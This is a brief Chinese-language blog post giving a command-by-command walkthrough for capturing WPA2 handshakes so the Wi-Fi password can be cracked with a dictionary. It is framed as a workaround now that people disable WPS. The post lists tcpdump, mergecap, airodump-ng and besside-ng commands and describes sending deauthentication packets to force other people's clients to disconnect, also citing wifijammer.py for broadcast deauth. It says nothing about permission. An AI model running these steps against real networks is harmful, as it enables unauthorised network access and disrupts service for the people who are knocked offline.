抓 WPA2 握手.
Jun 3, 2016
现在大部分人都学精了,然后 WPS 都关了,这就十分尴尬了.
不过我们还是有个老办法,抓握手然后跑字典.
抓握手的话,基本点的方式是用 tcpdump.
tcpdump "ether proto 0x888e and ether host 'bssid'" -I -U -vvv -i en0 -w eapol.cap
tcpdump "type mgt subtype beacon and ether src 'bssid'" -I -c 1 -i en0 -w beacon.cap
其中记得将 bssid 替换为 Wi-Fi 的 bssid.在捕获 eapol 的时候你需要等待 Got 0 变为 Got 4,这样你就抓到了 4-way 的握手,然后我们把它合并为你要跑的 *.cap.
mergecap -a -F pcap -w handshake.cap beacon.cap eapol.cap
handshake.cap 就是我们需要的文件了.
[](https://oao.moe/wp-content/uploads/2016/06/photo_2016-06-03_14-35-32.jpg)
使用 Wireshark 查看 handshake.cap
或者我们可以使用 aircrack-ng. aircrack 套件中你可以直接用 airodump-ng 来抓取.
airmon-ng start wlan0 #打开监听模式
airodump-ng wlan0mon
#可以指定 bssid
airodump-ng wlan0mon --bssid
当然还有高级点的,besside-ng.
besside-ng wlan0mon
besside-ng wlan0mon -b #bssid
besside-ng 会发送 deauth 包让对方的客户端断开连接,他们重新连接的时候,我们就可以抓到 handshake 了.
PS:wifijammer.py 也是这个方法,全局广播 deauth.
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.